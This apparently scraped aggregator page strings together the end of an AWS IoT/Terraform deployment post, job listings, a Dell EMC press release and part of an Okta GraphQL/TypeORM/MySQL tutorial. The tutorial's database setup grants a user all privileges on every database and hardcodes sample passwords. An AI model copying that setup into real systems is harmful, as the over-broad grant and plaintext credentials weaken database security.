
redisPubSub.subscribe("sensors") {
  case M(channel, message) =>
    val latest = redis.get("sensorLatest")
    val count = redis.get("sensorCount")
    redisActor ! s"""{ "latest": "${latest.getOrElse("0")}", "count": "${count.getOrElse("0")}" }"""
  case S(channel, noSubscribed) => println(s"Successfully subscribed to channel $channel")
  case other => println(s"Ignoring message from redis: $other")
}

Creating the Redis source is done using a combination of Source.actorRef and the BroadcastHub.sink. The source actor will emit every message it receives to the stream. We configure a buffer size of 1000 messages and discard the youngest element to make room for a new one in case of an overflow. Inside the subscription callback we can query Redis for the latest data and then send a JSON object to the Redis actor.

The broadcast hub sink emits a source we can plug into our WebSocket sink to generate the flow that will handle incoming WebSocket messages. As we need both, the actor and the source, we will keep both materialized values.

Now we can build our fat jar and upload it to S3. As it is basically the same procedure as in the Elastic Beanstalk post we are not going to go into detail at this point. Let's look at the Terraform resources next.

Terraform

First, we have to reference the fat jar inside the S3 bucket. Because the bucket has to exist before we can publish the jar using SBT, the Terraform deployment needs to happen in two stages. First we create only the artifact bucket and run sbt webui/publish, then we deploy the remaining infrastructure.

resource "aws_s3_bucket" "webui" {
  bucket        = "${local.project_name}-webui-artifacts"
  acl           = "private"
  force_destroy = true
}

data "aws_s3_bucket_object" "application-jar" {
  bucket = "${aws_s3_bucket.webui.id}"
  key    = "de/frosner/${local.webui_project_name}_2.12/${var.webui_version}/${local.webui_project_name}_2.12-${var.webui_version}-assembly.jar"
}

Next we can define the Elastic Beanstalk application, environment, and version. We are omitting all settings related to networking and execution at this point. The Redis connection details will be passed as environment variables. To enable WebSocket communication through the load balancer, we have to switch the protocol from HTTP to TCP using the LoadBalancerPortProtocol setting. In a proper setup you would also have to adjust the nginx configuration because otherwise the connection might be terminated irregularly.

resource "aws_elastic_beanstalk_application" "webui" {
  name = "${local.project_name}"
}

resource "aws_elastic_beanstalk_environment" "webui" {
  name                = "${local.project_name}"
  application         = "${aws_elastic_beanstalk_application.webui.id}"
  solution_stack_name = "64bit Amazon Linux 2018.03 v2.7.1 running Java 8"

  setting {
    namespace = "aws:elasticbeanstalk:application:environment"
    name      = "redis_url"
    value     = "${aws_elasticache_cluster.sensors.cache_nodes.0.address}"
  }
  setting {
    namespace = "aws:elasticbeanstalk:application:environment"
    name      = "redis_port"
    value     = "${aws_elasticache_cluster.sensors.port}"
  }
  setting {
    namespace = "aws:elb:loadbalancer"
    name      = "LoadBalancerPortProtocol"
    value     = "TCP"
  }
}

resource "aws_elastic_beanstalk_application_version" "default" {
  name        = "${local.webui_assembly_prefix}"
  application = "${aws_elastic_beanstalk_application.webui.name}"
  description = "application version created by terraform"
  bucket      = "${aws_s3_bucket.webui.id}"
  key         = "${data.aws_s3_bucket_object.application-jar.key}"
}

output "aws_command" {
  value = "aws elasticbeanstalk update-environment --application-name ${aws_elastic_beanstalk_application.webui.name} --version-label ${aws_elastic_beanstalk_application_version.default.name} --environment-name ${aws_elastic_beanstalk_environment.webui.name}"
}

That's it! Now we have all required resources defined, except for the networking part which we skipped intentionally. Note that you cannot use the default VPC and subnets and security groups as otherwise neither the Lambda nor the Elastic Beanstalk EC2 instances can connect to ElastiCache. Next let's see our baby in action!

Deployment and Usage

As mentioned before the deployment is done in multiple steps. First we create only the S3 bucket for uploading the Elastic Beanstalk artifact. Then we provision the remaining infrastructure. As Terraform does not support deploying Elastic Beanstalk application versions at this point we will execute the generated AWS CLI command afterwards.

cd terraform && terraform apply -auto-approve -target=aws_s3_bucket.webui; cd -
sbt kinesis/assembly && sbt webui/publish && cd terraform && terraform apply -auto-approve; cd -
cd terraform && $(terraform output | grep 'aws_command' | cut -d'=' -f2) && cd -
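
If the last command fails, it usually helps to verify that the jar really ended up under the key expected by the aws_s3_bucket_object data source and that the environment update went through. The commands below are only meant as a hint; the bucket and environment names depend on your project name.

aws s3 ls s3://<project-name>-webui-artifacts/de/frosner/ --recursive
aws elasticbeanstalk describe-environments --environment-names <project-name> --query 'Environments[].[Status,Health,VersionLabel]'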

After completion we can open the Elastic Beanstalk environment URL to see the UI. If we assigned a DNS name, we could use that one instead. Then we open the AWS IoT Console in another browser tab and navigate to the Test page. There we scroll to the Publish section, enter topic/sensors as the topic, and start publishing MQTT messages.
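
If you prefer the command line over the console, you can also publish a test message through the AWS CLI. The payload below is just an example shape, not the actual schema expected by the Lambda function:

# With AWS CLI v2 you may additionally need --cli-binary-format raw-in-base64-out
aws iot-data publish \
  --topic "topic/sensors" \
  --payload '{"sensorId": "sensor-1", "value": 25.3}'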

[Demo animation]

Conclusion

In this blog post we have seen how to route MQTT messages towards Kinesis streams using IoT Core rules. Kinesis Firehose delivery streams are a convenient way to automatically persist a data stream in batches. Kinesis data streams as Lambda event sources give more granular control over what to do with the data. With ElastiCache Redis as an intermediate storage layer and notification service, we enable clients to get near-real-time updates of the sensors.

Looking at the example solution we built, there are a few things we could have done differently. Instead of paying for the Firehose delivery stream and the Kinesis data stream at the same time, we could use only the data stream and add a custom polling consumer that persists the data in batches, potentially performing some basic format conversions such as writing a compressed columnar storage format.

While configuring Kinesis as an event source for Lambda works great, it might become a bit costly if the Lambda function is constantly running. In that case it could pay off to use a custom consumer deployed on ECS or EC2, for example.

Using Redis as the intermediate storage layer is only one out of many options, and picking the right data store for your problem is not trivial. Redis is fast because it is in-memory. If you need a more durable and scalable database, DynamoDB is also an option, and clients can subscribe to changes in a DynamoDB table through DynamoDB Streams. Maybe you also want to add Elasticsearch or Graphite as consumers.

What do you think? Did you use AWS IoT already for one of your projects? Did you also manage to automate the device management using Terraform? Please comment below!

Cover image by Wilgengebroed on Flickr - Cropped and sign removed from Internet of things signed by the author.jpg, CC BY 2.0, https://commons.wikimedia.org/w/index.php?curid=32745645


          Error on vagrant up when setting up a VCCW environment with Vagrant      Cache   Translate Page   Web Page Cache
VCCW automates the installation and configuration of the various tools needed to run WordPress, such as PHP, Apache, the MySQL database software, and wordmove, a Ruby-based tool that can be used for environment migration. …
          Customize a Joomla extension      Cache   Translate Page   Web Page Cache
I need to modify a paid Joomla extension called JSN UniForm. It allows creating forms and offers the option to upload a file (in this case, photos only) within the form. The changes I need... (Budget: $10 - $30 USD, Jobs: CSS, HTML, Joomla, MySQL, PHP)
          Monitoring Zadarma numbers in Zabbix      Cache   Translate Page   Web Page Cache
I am offering a ready-made Zabbix template and a Python script for auto-discovering new numbers from the provider Zadarma (new meaning numbers you have purchased).

The template contains several triggers and the basic information about the numbers. The script works with the Zadarma API or with a MySQL database.

For the MySQL variant, the data has to be put into the database beforehand, via cron or directly from the dialplan using a separate script.

Both scripts are below the cut.
Read more →
           [HTML][MySQL][PHP] Getting a date into the database      Cache   Translate Page   Web Page Cache
none
          I will commission the writing of a simple database in PHP and MySQL      Cache   Translate Page   Web Page Cache
none
          Delivery Module Lead - Mphasis - Bengaluru, Karnataka      Cache   Translate Page   Web Page Cache   
FULL-STACK DEVELOPER - JAVA - JAVA/J2EE/SPRING/RESTFUL/SOAP/ANGULARJS/NODEJS/RDBMS/NOSQL (MONGODB/CASSANDRA/MYSQL). Hands-on with Front End...
From Mphasis - Thu, 21 Jun 2018 12:28:35 GMT - View all Bengaluru, Karnataka jobs
          Wordpress to SuiteCRM integration      Cache   Translate Page   Web Page Cache   
This project involves the creation/update of SuiteCRM records based on WordPress records. The web application makes use of the WordPress Events Tickets Plugin to register attendees for classes. The plugin uses... (Budget: $30 - $250 USD, Jobs: CRM, MySQL, PHP, Software Architecture, WordPress)
          Software Developer - UNIVA - Toronto, ON      Cache   Translate Page   Web Page Cache   
Some experience with databases such as Oracle, BerkeleyDB, Postgres, or MySQL. Univa is currently seeking a Software Developer for our Product Engineering team...
From UNIVA - Mon, 23 Apr 2018 05:57:51 GMT - View all Toronto, ON jobs
          Developer, Back End - Java/Spring /Hibernate/RESTful API, etc.- Montreal - TouchTunes / PlayNetwork - Montréal, QC      Cache   Translate Page   Web Page Cache   
Experience developing applications with MySQL, Oracle and NoSQL data stores. Developer, Back End - Java/Spring /Hibernate/RESTful API, etc....
From TouchTunes / PlayNetwork - Tue, 10 Jul 2018 23:47:40 GMT - View all Montréal, QC jobs
          Backend Developer - Octagon Technology Staffing - Toronto, ON      Cache   Translate Page   Web Page Cache   
Experience with database technologies – at least one of MySQL, Oracle, PostgreSQL, MongoDB or Cassandra. Octagon is seeking a Full-time Back-end Developer for... $70,000 - $100,000 a year
From Dice - Thu, 14 Jun 2018 04:31:21 GMT - View all Toronto, ON jobs
          Sr Software Engineer - Full-Stack - CA Technologies - Vancouver, BC      Cache   Translate Page   Web Page Cache   
Database – MySQL, PostgreSQL, Oracle, SQL Server. Do you want to help eliminate barriers between ideas and business outcomes?...
From CA Technologies - Fri, 20 Apr 2018 21:46:04 GMT - View all Vancouver, BC jobs
          Prestashop module for crawling products      Cache   Translate Page   Web Page Cache   
I want a person to build a Prestashop module; it has to crawl a website to import products and attributes. I have the basic module skeleton and the structure of classes for the crawler, I hope you... (Budget: €30 - €250 EUR, Jobs: eCommerce, MySQL, PHP, Prestashop, Software Architecture)
          instance disappeared from dashboard.      Cache   Translate Page   Web Page Cache   
I have two startups. I created one AWS account for each of them (each account has different names, email addresses and logins). I created one MySQL instance for each account, and each instance has its own credentials. So nothing should be shared...
          Software Engineer -React.JS, RoR, MySQL- (125K - 140K)      Cache   Translate Page   Web Page Cache   
IL-Naperville, Job title: Full-Stack Software Engineer Job Location: Naperville, IL Required Skills: Ruby On Rails, React.JS (Preferred), MySQL, SQL, Angular.JS, or Amber.JS Salary: 125K - 140K Located in beautiful Libertyville, IL, we are the leading Sr. level performance capital level management company in the state of Illinois. We encourage and emphasize collaboration and innovation in all of our employees. W
          RDS MySQL Latency Issues      Cache   Translate Page   Web Page Cache   
We are facing latency issues in our RDS MySql instance, located in "sa-east".
...
          Optimizing my php code.      Cache   Translate Page   Web Page Cache   
I am looking for a very experienced database and query developer. I currently have a query that is too heavy and needs optimization (maybe a rewrite). I am looking for someone that can handle stored... (Budget: $10 - $30 USD, Jobs: MySQL, PHP)
          Sending bulk Whatsapp messages via API - marketing      Cache   Translate Page   Web Page Cache   
Need to develop a script to enable us to send bulk WhatsApp messages using an API, for example in PHP. Need to be able to upload a text file with phone numbers and insert a message that gets sent to all numbers in the text file automatically... (Budget: $30 - $250 USD, Jobs: Javascript, MySQL, PHP, Python, Software Architecture)
          Dell EMC Offers Mid-Size Organizations Simply Powerful Data Protection at the Lowest Cost to Protect      Cache   Translate Page   Web Page Cache   
News From Dell EMC
Transmitted by PR Newswire for Journalists on July 11, 2018 08:00 AM EST

New Dell EMC IDPA DP4400 delivers innovative capabilities and broad application support in a solution sized and priced right for mid-market customers

HOPKINTON, Mass., July 11, 2018 /PRNewswire/ --

News Summary:
   <ul type="disc">
    <li>New Dell EMC Integrated Data Protection Appliance (IDPA) DP4400 designed for mid-size organizations offers converged data protection—back-up, deduplication, replication and recovery, along with disaster recovery and long-term retention to the cloud </li>
    <li>Delivers lowest cost to protect, with up to 2x shorter backup times, protects up to 4x more data in single 2U appliance with average 55:1 data deduplication </li>
    <li>Simple to manage, deploy and upgrade; grows in place from 24-96TB – and up to 192TB in the cloud – with no additional hardware </li>
    <li>Leading-edge VMware integration empowers vAdmins to perform most common backup and recovery tasks directly from native vSphere UI </li>
    <li>Included in Dell EMC Future-Proof Loyalty Program, with new, up to 55:1 Data Protection Deduplication Guarantee </li>
   </ul>
Full Story:

Dell EMC announced its newest Integrated Data Protection Appliance (IDPA), the Dell EMC IDPA DP4400, providing simple and powerful converged data protection to help mid-size organizations transform IT while combating data sprawl and complexity.
Comprehensive data protection has been a challenge for mid-size organizations. Enterprise-class products come with higher cost and complexity, while lower cost products that have traditionally targeted these organizations sacrifice performance, efficiency and application support. Dell EMC built the IDPA DP4400 from the ground up as a simple, yet powerful, solution for mid-size organizations - featuring enterprise-class capabilities for backup, deduplication, replication and recovery. IDPA DP4400 also offers built-in cloud readiness features with disaster recovery and long-term data retention to the cloud.

"For years, mid-size organizations haven't quite had a comprehensive data protection solution that was sized and priced right for them," said Beth Phalen, President, Data Protection, Dell EMC. "With the IDPA DP4400 there are no compromises. We're delivering a converged data protection solution that's as simple to use as it is powerful - with support for the largest application ecosystem and expansion to the cloud. The IDPA DP4400 offers the right level of modern features and capabilities for mid-size data centers at the lowest cost to protect."

Simple and Powerful, at the Lowest Cost to Protect

The IDPA DP4400 blends simplicity and performance for mid-size organizations and remote office-branch office (ROBO) environments. The solution is designed to provide organizations the lowest cost to protect[i] and is guaranteed under the Dell EMC Future-Proof Loyalty program.

The IDPA DP4400 is a converged data protection appliance in a dense 2U platform powered by Dell EMC PowerEdge 14th generation servers. Key features include:
   <ul type="disc">
    <li><b>Customer-installable and easy-to-use HTML5 user interface:</b> Makes IDPA DP4400 ideal for deployment and management in mid-sized organizations and ROBO locations. </li>
    <li><b>Grows in place with no downtime: </b>A single 24TB appliance can grow in place to 96TB with a license key and no additional hardware to purchase. </li>
    <li><b>Protect more data with 55:1<b><sup>ii</sup></b> average deduplication: </b>IDPA DP4400 can protect approximately 5PB of usable data capacity. And, with native Cloud Tier for long-term retention, the total protected usable capacity increases to 14.4 PB. </li>
    <li><b>Supports largest application ecosystem<b><sup>iii</sup></b>: </b>Includes support for modern applications such as MySQL and MongoDB, both physical and virtual, and support for multiple hypervisors (VMware vSphere and Microsoft Hyper-V). </li>
    <li><b>Delivers powerful performance with NVMe flash:</b> Shortens backup windows by up to 2x<sup>iv</sup>; backs up only de-duplicated data requiring up to 98% less bandwidth<sup>v</sup>; and supports 7x more backup streams while delivering instant access and restore of virtual machines to help meet stringent SLAs and RPOs. </li>
    <li><b>Cloud-ready solution:</b> IDPA DP4400 comes with 5TB licenses each for Cloud Disaster Recovery and Cloud Tier as well as a Dell EMC <a href="http://email.prnewswire.com/wf/click?upn=7VDqtAz2AW-2FeY7XnbvsasTa7lrQmb0NwBa2-2BjgAaZMcKOQ-2BDPsBK2qW5RqO8dUWYkz2XEpzccGhCgZHa1C2tPbT6QUC4ug2AJIl7Afu-2BVp6GgxhW56jXC67jSSS-2BzGeQ_q1N77mbql2CxsoEfo2fFiZ6dnlev64IGUSa1KT1DDw1MuprZmQ6aap9NY9k0Le754nDm4PI-2BtkgM1S-2B9p-2Fn9q5ZJm1Q-2F2nzc5uTbm4YL3y3uKePsuB2bRB2Cp-2Br4SeKq9ERYnqvOyLi4QNP7KYh4bZUp7EVwsjR6VmznvUlIrQAaw2Bl5QXmWMRT3YN51QWJmfYnKkr8GKVuJauhgTabB3r2Hzw6oP-2F-2BJTkyyGVgz9npDVJC8cMSr473rZEdwnhiLAnwPVJChs0y07p-2BvhDuZeeBBJnR4Xde3ZRo9Y0A3swQfEG6kDx6LNJUrRPSAiU5Zy17cRod0aU1BTeFODLEhg-3D-3D#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" rel="nofollow#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" target="_blank">RecoverPoint for Virtual Machines</a> starter pack that provides five VMs and a one-year subscription<sup>vi</sup>.</li>
   </ul>
The IDPA DP4400 simplifies data protection management via a modern HTML 5 user interface that automates daily tasks including management, monitoring and reporting. In addition, integration with VMware native tools, SQL Server Management Studio and Oracle RMAN enables application administrators to leverage protection features within familiar user interfaces.

With an average 55:1 deduplication rate, the IDPA DP4400 also offers efficient and cost-effective native Cloud Disaster Recovery (to Amazon AWS) with end-to-end orchestration - failover in three clicks, and failback in two clicks - all without the need for additional hardware.

The IDPA DP4400 is optimized for VMware environments, with leading integration that enables vAdmins to perform most common backup and recovery tasks directly from the native vSphere UI. Protecting up to 5x more VMs in a single 2U appliance[vii] and with automation across the entire VMware data protection stack (VM deployment, deployment of proxies and movement of data to protection storage), the IDPA DP4400 makes it easy and cost-effective to scale up to protect more VMs. It also provides faster VMware backups and recoveries, and more efficient networking and capacity with its leading deduplication and bandwidth utilization.

The IDPA DP4400 offers customers excellent value and TCO - costing up to 80% less to protect[viii]. With up to 2x faster backup windows[ix], up to 20% more capacity in a 2U appliance[x], and an average rate of 55:1 deduplication - it offers the lowest cost to protect among competing products in its class[xi].

Guaranteed under the Dell EMC Future-Proof Loyalty Program

The IDPA DP4400 is part of the Dell EMC Future-Proof Loyalty Program, offering a three-year Satisfaction Guarantee[xii], Hardware Investment Protection[xiii], up to 55:1 Data Protection Deduplication Guarantee[xiv], and Clear Price - giving customers additional peace of mind with consistent and predictable maintenance pricing.

Availability:

The Dell EMC IDPA DP4400 is available immediately through Dell EMC and authorized channel partners, starting at under US$80,000.
Customer Quotes:
Brian Linden, IT Director, Melanson Heath
"The IDPA DP4400 is a great product because it's all in one. It's highly scalable so you know that you've got great expansion capabilities. Because it's Dell EMC, it's ready to go and I can trust that I don't have to do a lot of research and vetting to make sure it's going to work for me. That's peace of mind."

John Sharp, IT Manager, The Vollrath Company
"Installation for IDPA DP4400 is easy. Within two hours we were off and running. I don't have to be Lou Ferrigno to rack a 2U. It goes in quick. It plugs in and is ready to back up our data. It just works!"

Partner Quote:
Seife Teklu, Senior Solutions Architect, Arrow Electronics
"Before the announcement of IDPA DP4400, customers deployed individual data protection software components. Some customers did not leverage monitoring, search, analytics and reporting tools that were available to them. Dell EMC IDPA DP4400 integrated data protection appliance introduces a simple intuitive management interface with enterprise features. IDPA DP4400 appliance saves time, reduces overall risk and provides customers the tools they need for deeper insight into their data protection environment, making it an ideal solution for SMB and SME customers."

Industry Analyst Quote
Phil Goodwin, Research Director, Storage Systems and Software, IDC
"Organizations today, especially mid-size organizations, are faced with increased complexity - relentless data growth, application diversity, increased numbers of users, and resource constraints - driving the need for solutions to meet these challenges with existing staff. However, users do not want to trade off simplicity for performance or capabilities. With the IDPA DP4400, Dell EMC is targeting a large swath of enterprises in that middle tier that want an all-in-one solution that is affordable, easy-to-use and has the modern data protection features they require to ensure their data is safe and their business can quickly recover in case disaster strikes."
Additional Resources:
- Blog: "Simply Powerful Data Protection for Midsize Orgs @ the Lowest Cost to Protect"
- Channel Blog: "Ride the HCI Growth Curve with the New Dell EMC Integrated Data Protection Appliance (IDPA) DP4400"
- IDPA DP4400 data sheet
- Tune in to our August 15 Wikibon CrowdChat - Discuss the IDPA DP4400 with Dell EMC's Data Protection experts
- Dell EMC Integrated Data Protection Appliance webpage
- Connect with Dell EMC via Twitter, Facebook, YouTube, LinkedIn and ECN.
About Dell EMC

Dell EMC, a part of Dell Technologies, enables organizations to modernize, automate and transform their data center using industry-leading converged infrastructure, servers, storage and data protection technologies. This provides a trusted foundation for businesses to transform IT, through the creation of a hybrid cloud, and transform their business through the creation of cloud-native applications and big data solutions. Dell EMC services customers across 180 countries - including 98 percent of the Fortune 500 - with the industry's most comprehensive and innovative portfolio from edge to core to cloud.

Copyright © 2018 Dell Inc. or its subsidiaries. All Rights Reserved. Dell, EMC and other trademarks are trademarks of Dell Inc. or its subsidiaries. Other trademarks may be trademarks of their respective owners.
[i] Dell EMC internal analysis using publicly available competitive pricing from Rubrik and Cohesity, May 2018. Lowest cost to protect is based on $ per logical GB. Actual cost will vary.
[ii] Based on Dell EMC internal analysis of customer data as of May 2018.
[iii] Based on internal analysis, June 2018.
[iv] Source: ESG Lab Review commissioned by Dell EMC, February 2018, versus a competitive Vendor A. Additional information on the testing environment.
[v] Source: Based on Dell EMC internal testing.
[vi] Free option when selected at the time of purchase.
[vii] Source: Based on Dell EMC internal testing and comparing against Rubrik's published performance data in 2U, February 2018.
[viii] Source: Dell EMC internal analysis using publicly available competitive pricing from Rubrik and Cohesity, May 2018. Based on $ per logical GB. Actual cost will vary.
[ix] Source: ESG Lab Review commissioned by Dell EMC, February 2018, versus a competitive Vendor A. Additional information on the testing environment.
[x] Based on Dell EMC internal analysis, May 2018, using Rubrik's published data. Actual results will vary.
[xi] Dell EMC internal analysis using publicly available competitive pricing from Rubrik and Cohesity, May 2018. Lowest cost-to-protect is based on $ per logical GB. Actual cost will vary.
[xii] Satisfaction Guarantee: Requires purchase of a 3-year ProSupport agreement. Compliance is based on product specifications. Any refund will be prorated.
[xiii] Hardware Investment Protection: Trade-In value determined based on market conditions at Dell EMC's sole discretion.
[xiv] Up to 55:1 Data Protection Deduplication Guarantee guarantees effective logical data protection storage capacity of up to 55x the purchased physical capacity. Individual results may vary.
   
Optimizing my PHP code.
I am looking for a very experienced database and query developer. I currently have a query that is too heavy and needs optimization (maybe a rewrite). I am looking for someone who can handle stored... (Budget: $10 - $30 USD, Jobs: MySQL, PHP)
Sending bulk WhatsApp messages via API - marketing
Need to develop a script that lets us send bulk WhatsApp messages using an API (for example, in PHP). We need to be able to upload a text file with phone numbers and enter a message that gets sent to every number in the file automatically... (Budget: $30 - $250 USD, Jobs: Javascript, MySQL, PHP, Python, Software Architecture)
Build a Health Tracking App with React, GraphQL, and User Authentication

I think you’ll like the story I’m about to tell you. I’m going to show you how to build a GraphQL API with Vesper framework, TypeORM, and MySQL. These are Node frameworks, and I’ll use TypeScript for the language. For the client, I’ll use React, reactstrap, and Apollo Client to talk to the API. Once you have this environment working, and you add secure user authentication, I believe you’ll love the experience!

Why focus on secure authentication? Well, aside from the fact that I work for Okta, I think we can all agree that pretty much every application depends upon a secure identity management system. For most developers who are building React apps, there’s a decision to be made between rolling your own authentication/authorization or plugging in a service like Okta. Before I dive into building a React app, I want to tell you a bit about Okta, and why I think it’s an excellent solution for all JavaScript developers.

What is Okta?

In short, we make identity management a lot easier, more secure, and more scalable than what you’re used to. Okta is a cloud service that allows developers to create, edit, and securely store user accounts and user account data, and connect them with one or multiple applications. Our API enables you to authenticate and authorize your users, store data about them, handle password-based and social login, secure your application with multi-factor authentication, and much more.

Are you sold? Register for a forever-free developer account, and when you’re done, come on back so we can learn more about building secure apps in React!

Why a Health Tracking App?

In late September through mid-October 2014, I’d done a 21-Day Sugar Detox during which I stopped eating sugar, started exercising regularly, and stopped drinking alcohol. I’d had high blood pressure for over ten years and was on blood-pressure medication at the time. During the first week of the detox, I ran out of blood-pressure medication. Since a new prescription required a doctor visit, I decided I’d wait until after the detox to get it. After three weeks, not only did I lose 15 pounds, but my blood pressure was at normal levels!

Before I started the detox, I came up with a 21-point system to see how healthy I was each week. Its rules were simple: you can earn up to three points per day for the following reasons:

  1. If you eat healthy, you get a point. Otherwise, zero.
  2. If you exercise, you get a point.
  3. If you don’t drink alcohol, you get a point.

I was surprised to find I got eight points the first week I used this system. During the detox, I got 16 points the first week, 20 the second, and 21 the third. Before the detox, I thought eating healthy meant eating anything except fast food. After the detox, I realized that eating healthy for me meant eating no sugar. I’m also a big lover of craft beer, so I modified the alcohol rule to allow two healthier alcohol drinks (like a greyhound or red wine) per day.

My goal is to earn 15 points per week. I find that if I get more, I’ll likely lose weight and have good blood pressure. If I get fewer than 15, I risk getting sick. I’ve been tracking my health like this since September 2014. I’ve lost weight, and my blood pressure has returned to and maintained normal levels. I haven’t had good blood pressure since my early 20s, so this has been a life changer for me.

I built 21-Points Health to track my health. I figured it’d be fun to recreate a small slice of that app, just tracking daily points.

Building an API with TypeORM, GraphQL, and Vesper

TypeORM is a nifty ORM (object-relational mapper) framework that can run in most JavaScript platforms, including Node, a browser, Cordova, React Native, and Electron. It’s heavily influenced by Hibernate, Doctrine, and Entity Framework. Install TypeORM globally to begin creating your API.

npm i -g typeorm@0.2.7

Create a directory to hold the React client and GraphQL API.

mkdir health-tracker
cd health-tracker

Create a new project with MySQL using the following command:

typeorm init --name graphql-api --database mysql

Edit graphql-api/ormconfig.json to customize the username, password, and database.

{
    ...
    "username": "health",
    "password": "pointstest",
    "database": "healthpoints",
    ...
}

TIP: To see the queries being executed against MySQL, change the “logging” value in this file to be “all”. Many other logging options are available too.
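For example, assuming you keep the rest of the generated file as-is, the relevant part of graphql-api/ormconfig.json would look like the snippet below (TypeORM also accepts an array such as ["query", "error"] if you only want certain categories logged):

{
    ...
    "logging": "all",
    ...
}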

Install MySQL

Install MySQL if you don’t already have it installed. On Ubuntu, you can use sudo apt-get install mysql-server. On macOS, you can use Homebrew and brew install mysql. For Windows, you can use the MySQL Installer.

Once you’ve got MySQL installed and configured with a root password, login and create a healthpoints database.

mysql -u root -p
create database healthpoints;
use healthpoints;
grant all privileges on *.* to 'health'@'localhost' identified by 'pointstest';

Navigate to your graphql-api project in a terminal window, install the project’s dependencies, then start it to ensure you can connect to MySQL.

cd graphql-api
npm i
npm start

You should see the following output:

Inserting a new user into the database...
Saved a new user with id: 1
Loading users from the database...
Loaded users:  [ User { id: 1, firstName: 'Timber', lastName: 'Saw', age: 25 } ]
Here you can setup and run express/koa/any other framework.

Install Vesper to Integrate TypeORM and GraphQL

Vesper is a Node framework that integrates TypeORM and GraphQL. To install it, use good ol’ npm.

npm i vesper@0.1.9

Now it’s time to create some GraphQL models (that define what your data looks like) and some controllers (that explain how to interact with your data).

Create graphql-api/src/schema/model/Points.graphql:

type Points {
  id: Int
  date: Date
  exercise: Int
  diet: Int
  alcohol: Int
  notes: String
  user: User
}

Create graphql-api/src/schema/model/User.graphql:

type User {
  id: String
  firstName: String
  lastName: String
  points: [Points]
}

Next, create a graphql-api/src/schema/controller/PointsController.graphql with queries and mutations:

type Query {
  points: [Points]
  pointsGet(id: Int): Points
  users: [User]
}

type Mutation {
  pointsSave(id: Int, date: Date, exercise: Int, diet: Int, alcohol: Int, notes: String): Points
  pointsDelete(id: Int): Boolean
}

Now that your data has GraphQL metadata, create entities that will be managed by TypeORM. Change src/entity/User.ts to have the following code that allows points to be associated with a user.

import { Column, Entity, OneToMany, PrimaryColumn } from 'typeorm';
import { Points } from './Points';

@Entity()
export class User {

  @PrimaryColumn()
  id: string;

  @Column()
  firstName: string;

  @Column()
  lastName: string;

  @OneToMany(() => Points, points => points.user)
  points: Points[];
}

In the same src/entity directory, create a Points.ts class with the following code.

import { Entity, PrimaryGeneratedColumn, Column, ManyToOne } from 'typeorm';
import { User } from './User';

@Entity()
export class Points {

  @PrimaryGeneratedColumn()
  id: number;

  @Column({ type: 'timestamp', default: () => 'CURRENT_TIMESTAMP'})
  date: Date;

  @Column()
  exercise: number;

  @Column()
  diet: number;

  @Column()
  alcohol: number;

  @Column()
  notes: string;

  @ManyToOne(() => User, user => user.points, { cascade: ["insert"] })
  user: User|null;
}

Note the cascade: ["insert"] option on the @ManyToOne annotation above. This option will automatically insert a user if it’s present on the entity; a short sketch of that behavior follows the controller code below. Create src/controller/PointsController.ts to handle converting the data from your GraphQL queries and mutations.

import { Controller, Mutation, Query } from 'vesper';
import { EntityManager } from 'typeorm';
import { Points } from '../entity/Points';

@Controller()
export class PointsController {

  constructor(private entityManager: EntityManager) {
  }

  // serves "points: [Points]" requests
  @Query()
  points() {
    return this.entityManager.find(Points);
  }

  // serves "pointsGet(id: Int): Points" requests
  @Query()
  pointsGet({id}) {
    return this.entityManager.findOne(Points, id);
  }

  // serves "pointsSave(id: Int, date: Date, exercise: Int, diet: Int, alcohol: Int, notes: String): Points" requests
  @Mutation()
  pointsSave(args) {
    const points = this.entityManager.create(Points, args);
    return this.entityManager.save(Points, points);
  }

  // serves "pointsDelete(id: Int): Boolean" requests
  @Mutation()
  async pointsDelete({id}) {
    await this.entityManager.remove(Points, {id: id});
    return true;
  }
}
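To illustrate the cascade: ["insert"] option mentioned above, here is a minimal sketch (not part of the article’s code; the helper name and user values are made up) showing that saving points with a brand-new user attached also inserts that user row:

import { EntityManager } from 'typeorm';
import { Points } from '../entity/Points';

// Hypothetical helper: saving points whose user does not exist yet.
async function savePointsForNewUser(entityManager: EntityManager) {
  const points = entityManager.create(Points, {
    exercise: 1,
    diet: 1,
    alcohol: 0,
    notes: 'cascade demo',
    // Because of cascade: ["insert"] on Points.user, this user is inserted
    // automatically when the points are saved.
    user: { id: 'user-123', firstName: 'Ada', lastName: 'Lovelace' }
  });
  return entityManager.save(Points, points);
}

Without the cascade option, you would have to save the User yourself before saving the Points that reference it.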

Change src/index.ts to use Vesper’s bootstrap() to configure everything.

import { bootstrap } from 'vesper';
import { PointsController } from './controller/PointsController';
import { Points } from './entity/Points';
import { User } from './entity/User';

bootstrap({
  port: 4000,
  controllers: [
    PointsController
  ],
  entities: [
    Points,
    User
  ],
  schemas: [
    __dirname + '/schema/**/*.graphql'
  ],
  cors: true
}).then(() => {
  console.log('Your app is up and running on http://localhost:4000. ' +
    'You can use playground in development mode on http://localhost:4000/playground');
}).catch(error => {
  console.error(error.stack ? error.stack : error);
});

This code tells Vesper to register controllers, entities, GraphQL schemas, to run on port 4000, and to enable CORS (cross-origin resource sharing).

Start your API using npm start and navigate to http://localhost:4000/playground. In the left pane, enter the following mutation and press the play button. You might try typing the code below so you can experience the code completion that GraphQL provides you.

mutation {
  pointsSave(exercise:1, diet:1, alcohol:1, notes:"Hello World") {
    id
    date
    exercise
    diet
    alcohol
    notes
  }
}

Your result should look similar to mine.

GraphQL Playground

You can click the “SCHEMA” tab on the right to see the available queries and mutations. Pretty slick, eh?!

You can use the following points query to verify that data is in your database.

query {
  points {id date exercise diet notes}
}
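If you prefer to verify it without the playground, the same query can be sent over plain HTTP. Here’s a minimal sketch you could paste into a browser console while the API is running (this assumes the endpoint accepts standard GraphQL-over-HTTP POST requests, which is what the Apollo client used later in this tutorial relies on):

// Send the points query to the GraphQL endpoint as a JSON POST body.
fetch('http://localhost:4000/graphql', {
  method: 'POST',
  headers: { 'Content-Type': 'application/json' },
  body: JSON.stringify({ query: '{ points { id date exercise diet notes } }' })
})
  .then(response => response.json())
  .then(json => console.log(json.data.points));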

Fix Dates

You might notice that the date returned from pointsSave and the points query is in a format that might be difficult for a JavaScript client to understand. You can fix that by installing graphql-iso-date.

npm i graphql-iso-date@3.5.0

Then, add an import in src/index.ts and configure custom resolvers for the various date types. This example only uses Date, but it’s helpful to know the other options.

